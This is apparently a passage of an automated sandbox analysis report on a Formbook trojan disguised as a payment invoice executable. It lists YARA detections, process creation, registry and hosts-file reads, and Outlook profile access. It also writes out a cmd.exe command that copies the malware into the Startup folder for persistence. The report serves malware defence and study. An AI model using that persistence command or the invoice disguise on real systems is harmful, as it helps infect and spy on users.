          Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
          Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: Process Memory Space: Payment INV NO. 230203-1USD.exe PID: 2332, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
          Source: Process Memory Space: Payment INV NO. 230203-1USD.exe PID: 5224, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_00BB93600_2_00BB9360
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_00BB8DA00_2_00BB8DA0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_00BB8D8F0_2_00BB8D8F
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06016E400_2_06016E40
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06014EE00_2_06014EE0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_060157B00_2_060157B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06014B980_2_06014B98
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_060609360_2_06060936
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_0606CA980_2_0606CA98
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_0606F9A80_2_0606F9A8
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B7D704_2_017B7D70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01790D204_2_01790D20
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B41204_2_017B4120
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C35D04_2_017C35D0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE1B94_2_017BE1B9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C65A04_2_017C65A0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB4774_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C88404_2_017C8840
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA8304_2_017BA830
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A841F4_2_017A841F
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A70F04_2_017A70F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179EC9B4_2_0179EC9B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB0904_2_017AB090
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAB404_2_017BAB40
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA3094_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B77F04_2_017B77F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CABD84_2_017CABD8
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BEB9A4_2_017BEB9A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C138B4_2_017C138B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F804_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8E604_2_017B8E60
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B6E304_2_017B6E30
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB2364_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B56004_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_004231484_2_00423148
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: String function: 0179B150 appears 67 times
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000000.314491631.000000000035C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHxD.exe> vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.337663491.00000000036E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.341938580.0000000005E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZlas.dll* vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.00000000029D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.340941869.0000000005C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.342535829.0000000006490000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000004.00000003.334116192.00000000016F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000004.00000003.331879839.0000000001551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000006.00000002.384903571.0000000003E56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000003192000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.396874473.000000000196F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.395781651.0000000000FF7000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exeBinary or memory string: OriginalFilenameHxD.exe> vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exe.1.drBinary or memory string: OriginalFilenameHxD.exe> vs Payment INV NO. 230203-1USD.exe
          Source: Payment INV NO. 230203-1USD.exeVirustotal: Detection: 7%
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe"
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment INV NO. 230203-1USD.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile created: C:\Users\user\AppData\Local\Temp\2SD0--712Jump to behavior
          Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@22/4@9/5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: Payment INV NO. 230203-1USD.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4468:120:WilError_01
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ipconfig.pdb source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.395781651.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Payment INV NO. 230203-1USD.exe, 00000007.00000002.395781651.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000000.00000002.342535829.0000000006490000.00000004.08000000.00040000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000003192000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\MultiChannelQueueModels\obj\Debug\HxD.pdb source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe.1.dr
          Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\Zlas\obj\Release\Zlas.pdb source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.341938580.0000000005E10000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment INV NO. 230203-1USD.exe, 00000004.00000003.334116192.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000003.331879839.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000007.00000002.396874473.0000000001850000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000037BF000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000003.396731237.0000000003500000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002E8F000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.398592445.0000000002BD4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.394760969.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe, 00000004.00000003.334116192.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000003.331879839.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000007.00000002.396874473.0000000001850000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000037BF000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000003.396731237.0000000003500000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.583001043.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002E8F000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.398592445.0000000002BD4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000003.394760969.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 0000000A.00000002.401814443.0000000002D70000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\MultiChannelQueueModels\obj\Debug\HxD.pdbX source: Payment INV NO. 230203-1USD.exe, Payment INV NO. 230203-1USD.exe.1.dr
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06060936 push es; retf 0_2_06069134
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06060936 push es; iretd 0_2_06069200
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06060936 push es; retf 068Dh0_2_060692B4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06060936 push es; ret 0_2_0606936C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_0606407B push es; retf 0_2_06069134
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 0_2_06064D85 push es; retf 0_2_06069134
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017ED0D1 push ecx; ret 4_2_017ED0E4

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the startup folder
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
